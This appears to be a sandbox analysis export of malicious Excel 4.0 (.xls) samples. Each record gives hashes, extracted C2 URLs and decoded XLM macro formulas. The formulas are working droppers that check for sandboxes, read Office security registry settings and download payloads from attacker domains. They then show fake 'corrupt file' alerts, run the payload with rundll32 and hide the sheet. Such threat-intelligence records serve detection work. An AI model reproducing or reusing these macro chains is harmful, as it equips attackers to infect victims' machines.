XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4Ylf5xickP\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"81e722f722bcf4203f7f23686484020674a6b65b546c415b4c2431b1e68f7053"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"81e722f722bcf4203f7f23686484020674a6b65b546c415b4c2431b1e68f7053","filesize":185344,"md5":"2e6329dde4b67d6b55271922277a5f97","sha1":"a00f018f1557f9b9585654518c450fac916ea339","sha256":"81e722f722bcf4203f7f23686484020674a6b65b546c415b4c2431b1e68f7053","sha512":"c85ed6716c5ead7faf659790315f58435e2aa5970d35015f03ebbe79aa0fb1466907fa059dc5b6124ca932bf96714d125f7ec2057305eab104f83bbea42ebdda","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"81e722f722bcf4203f7f23686484020674a6b65b546c415b4c2431b1e68f7053.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"81e96a275572ca060bcc257b7f8be15fd4dee9351091277b88ff72310fdc56f3"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"81e96a275572ca060bcc257b7f8be15fd4dee9351091277b88ff72310fdc56f3","filesize":206336,"md5":"06073cabf8ac265725fca99d24547b7c","sha1":"41217075ebcb1ec4efb52832ede031ff03adeb40","sha256":"81e96a275572ca060bcc257b7f8be15fd4dee9351091277b88ff72310fdc56f3","sha512":"b293e680abf15f2e8640cb80e2f6c647ff46f07652f1a35713e3942e584d937f6a8ef9d88403a293b08196715b231e776f4c60075540f8c9d2f607582bc2ff5c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"81e96a275572ca060bcc257b7f8be15fd4dee9351091277b88ff72310fdc56f3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ymihcQYLJU\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"81fc1868578344a61a246497ba67d5be130676e5a2a2771ee6c4ed3ed1d97bc9"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"81fc1868578344a61a246497ba67d5be130676e5a2a2771ee6c4ed3ed1d97bc9","filesize":168448,"md5":"4d4142e2d4b2e2910315a6f2be66946d","sha1":"22c9eb0bab3a67a5ce06b0e057a012060a3e87ca","sha256":"81fc1868578344a61a246497ba67d5be130676e5a2a2771ee6c4ed3ed1d97bc9","sha512":"5bbc2fba9b873d9b956fb86fa0f7045aa5c7c0b6a0a774ac23a86d81eb77096b6b2cd3612efa6a5870de50b83ec96afcb0421951a28baca306a932f96945c3e0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"81fc1868578344a61a246497ba67d5be130676e5a2a2771ee6c4ed3ed1d97bc9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nruNcRYtj9\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"822b6c62236655be3fe949df66568b787633f53ab8b0433bcf5db1ad6b533325"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"822b6c62236655be3fe949df66568b787633f53ab8b0433bcf5db1ad6b533325","filesize":185344,"md5":"b1b2850174f7be074335cad8da24826a","sha1":"e37080c9325e6819e528c913f98d9100a1fecda0","sha256":"822b6c62236655be3fe949df66568b787633f53ab8b0433bcf5db1ad6b533325","sha512":"24dd11f6f81cec6a521c04f74eaa0f15f16b04d47ce95b733b3c5aaf09146b70f2ae4f5366932ea7299062eff7a26b6433602cf72a626c63ba40608b1e0a8f47","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"822b6c62236655be3fe949df66568b787633f53ab8b0433bcf5db1ad6b533325.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"822d969fd726e58e964ff5c89933a8982bbdebe4aa2eeb26f7765f5fa75605ff"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"822d969fd726e58e964ff5c89933a8982bbdebe4aa2eeb26f7765f5fa75605ff","filesize":209408,"md5":"d8b7cd6ecf3414c895a3b61f97477a15","sha1":"befc89cf14bddcde052e10dff565ca37aac68cec","sha256":"822d969fd726e58e964ff5c89933a8982bbdebe4aa2eeb26f7765f5fa75605ff","sha512":"b4cd5445a5e2d5989da298424a45eebdce8fba7c300c452feceec051aa1602e914e8221866e1e4d7c719d8baa8f4625fb716aca5821bda01a63221dd94c9669c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"822d969fd726e58e964ff5c89933a8982bbdebe4aa2eeb26f7765f5fa75605ff.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Syh19eiRNr\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8241b8d609662cc7860febafc4c9cf91ce570b58edd835da46aa230062313091"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"8241b8d609662cc7860febafc4c9cf91ce570b58edd835da46aa230062313091","filesize":209920,"md5":"9752f4136c7225c5b001b40b36e19d6d","sha1":"1a242b82490b3626d1e444d1b58f87e757d77633","sha256":"8241b8d609662cc7860febafc4c9cf91ce570b58edd835da46aa230062313091","sha512":"56c0c5c878aebe35aef3653f34b3b8021de18712afb0ae99d0d106b125aa331ba8a2429a287ae9178e2a64828e25b2f900045ef78aa4f94a085d488ca43f821f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8241b8d609662cc7860febafc4c9cf91ce570b58edd835da46aa230062313091.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wsh9kPjTv6\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8242c2bc41784671ba3955e1099c35c0e52b7687cc79196d8e41c55f6aead473"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"8242c2bc41784671ba3955e1099c35c0e52b7687cc79196d8e41c55f6aead473","filesize":170496,"md5":"ad94b2a569b3a8a79d34c1a9b4f29553","sha1":"1a7281d28037be0c0b9e48c360a6e08f95c59538","sha256":"8242c2bc41784671ba3955e1099c35c0e52b7687cc79196d8e41c55f6aead473","sha512":"4161f057c6843cc916ec8ba08afcfb91ec207e965f8e616fd9ff11c7b4e4663592cbc1b2fc9548d20dce5f9d180d32a6b5feb6b7e4f4e4017b36598c6b1a4f10","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8242c2bc41784671ba3955e1099c35c0e52b7687cc79196d8e41c55f6aead473.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"d05v8KMdmi\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"824692e7e46928bc5b6a5aa9935165131d600a6fd48fae234c42111cfd665f9f"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"824692e7e46928bc5b6a5aa9935165131d600a6fd48fae234c42111cfd665f9f","filesize":214016,"md5":"401b8f94be38b2840704d6e2d2a24916","sha1":"56df25835f70fd2e4210df174a05c414475843b3","sha256":"824692e7e46928bc5b6a5aa9935165131d600a6fd48fae234c42111cfd665f9f","sha512":"9e2aaba490070af0724fb7f755624cee7d873c715ab0e507dfd7593e5db8f4fd4569bd69bee4b5fb8cf44c67cd30e0939b5fc08023622511c504ff756ca7a1bb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"824692e7e46928bc5b6a5aa9935165131d600a6fd48fae234c42111cfd665f9f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZHGQc2x4Fk\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8256a5ab4588ef74d241c4ca19298c9417422cbbd55b7a2767c8e748cc38da7c"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"8256a5ab4588ef74d241c4ca19298c9417422cbbd55b7a2767c8e748cc38da7c","filesize":141824,"md5":"f2464ac6afae08f9c3867a7ab3f82926","sha1":"c4d1d9045e94336d9c4e145debc6527d03e7ecc7","sha256":"8256a5ab4588ef74d241c4ca19298c9417422cbbd55b7a2767c8e748cc38da7c","sha512":"1d212f3dd3cb5fcc106acf0061150a88f8e6234dad36e9b98413ce6da8f0d6d70cf061dec4e6f931ef5b89ffaf9fd77134b635b65a593ef7b4ef7ebfb3c821f8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8256a5ab4588ef74d241c4ca19298c9417422cbbd55b7a2767c8e748cc38da7c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"B0tUq34gRr\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8256a6b3acb1c5792481ae0b4398acc808a4d65e194e01d986be70dca8c8fb36"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"8256a6b3acb1c5792481ae0b4398acc808a4d65e194e01d986be70dca8c8fb36","filesize":185344,"md5":"be5124dd485321fffff19c41cbec38a2","sha1":"432bd555098816492cd8a5b36987922417665186","sha256":"8256a6b3acb1c5792481ae0b4398acc808a4d65e194e01d986be70dca8c8fb36","sha512":"bdb00c86e08d866622b70b3565d6676ba50aae84df28aa621d30e94bdf11fb8db6bd11ac339671239d4b32034d1da3a46298dd0d1998b3128f5866178bbf7d98","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8256a6b3acb1c5792481ae0b4398acc808a4d65e194e01d986be70dca8c8fb36.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"828168ec69edfa0788ec4b9a4e3e6f9dca0128bb7127126837e632a394de223e"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"828168ec69edfa0788ec4b9a4e3e6f9dca0128bb7127126837e632a394de223e","filesize":209408,"md5":"6ae40f93e16020060b2c88b3ec509229","sha1":"7c36cc2adf75e438c0a7034b198ebdabae5bf11b","sha256":"828168ec69edfa0788ec4b9a4e3e6f9dca0128bb7127126837e632a394de223e","sha512":"9423177a27f012bdf3e1140ac4bd4f94fa05113fa202cc720068ede213d3a2ebf1c50e6bd66b0fba97a45b4cd07cc93437f7761fd0de0b526f8e7b4381a24d6c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"828168ec69edfa0788ec4b9a4e3e6f9dca0128bb7127126837e632a394de223e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nRWZcN64Ps\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"829e097e0e9a11e69a399f646fa6862c0d2086e0456449c37032d646350f5d7a"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"829e097e0e9a11e69a399f646fa6862c0d2086e0456449c37032d646350f5d7a","filesize":112128,"md5":"ddacaa034cd4954c337c436e7957fda3","sha1":"6b7f7b841dfb6bf192a7a1932eb02a74bad837ba","sha256":"829e097e0e9a11e69a399f646fa6862c0d2086e0456449c37032d646350f5d7a","sha512":"b1e8632ba1f45175fe8ad1872df2aff3609a4aed78e5003a7f33377131204d489cb840935ab4a40617d90a8d6b12b081e554e98e032d2317c715ee5760255554","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"829e097e0e9a11e69a399f646fa6862c0d2086e0456449c37032d646350f5d7a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"82b02356818c39755fbf054b771d4bfd55b5d5da4289140bc74213ceabff1205"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"82b02356818c39755fbf054b771d4bfd55b5d5da4289140bc74213ceabff1205","filesize":167936,"md5":"d1873acff0dfa80a92ebc1e314a068a8","sha1":"834c9c73dd7c1cd97f3ef67a970e831803883579","sha256":"82b02356818c39755fbf054b771d4bfd55b5d5da4289140bc74213ceabff1205","sha512":"3cafa809c94210291728745441800ba1232b0acd635690cbe267ba189f9ad08d64efb692a603071c95e7eab67db858785c1f7c38a3494cee6f4fe2a2194b7bd8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"82b02356818c39755fbf054b771d4bfd55b5d5da4289140bc74213ceabff1205.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5oI4t3xfpT\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"82b7fd7494877c6c453c815559958192e9c374abe8e75f14e26c3853bb7f8b62"},"analysis":{"reported":"2020-04-09T16:17:22Z","score":10},"files":[{"filename":"82b7fd7494877c6c453c815559958192e9c374abe8e75f14e26c3853bb7f8b62","filesize":141312,"md5":"08800072a90478926290acf45d97cc73","sha1":"d182bb5695e0f370c36a9afb668a910bde3458e1","sha256":"82b7fd7494877c6c453c815559958192e9c374abe8e75f14e26c3853bb7f8b62","sha512":"d4133c0184de39157d32342158ccffb5391007fd0f012556d4107e09f35fbdce243a30f32a56f3d8882ab17630a3578cbb66de03321af40e9b546fb604345c42","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"82b7fd7494877c6c453c815559958192e9c374abe8e75f14e26c3853bb7f8b62.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"IAAp8ih0NZ\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"82d6f4ecfd4224646c35324604a6b2bbb85243404c13cea98dd340642c7776d6"},"analysis":{"reported":"2020-04-09T16:17:22Z","score":10},"files":[{"filename":"82d6f4ecfd4224646c35324604a6b2bbb85243404c13cea98dd340642c7776d6","filesize":226304,"md5":"0c06457d46a7d927f473e3c758be04a1","sha1":"712f074fa72b2795db96434a2f87306ee86bd5fa","sha256":"82d6f4ecfd4224646c35324604a6b2bbb85243404c13cea98dd340642c7776d6","sha512":"b4ad80a3ba1db3f0615fdde6b301ae8b65b0e4bca1fde782e72b13a789bf4b46739b6be36c3395dfd32d88e4f64e27bde565c27b27652d00defda568f1a1c640","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"82d6f4ecfd4224646c35324604a6b2bbb85243404c13cea98dd340642c7776d6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"C9BcDuhnLx\",TRUE)\nGOTO(R$0C$17)"}}}]}
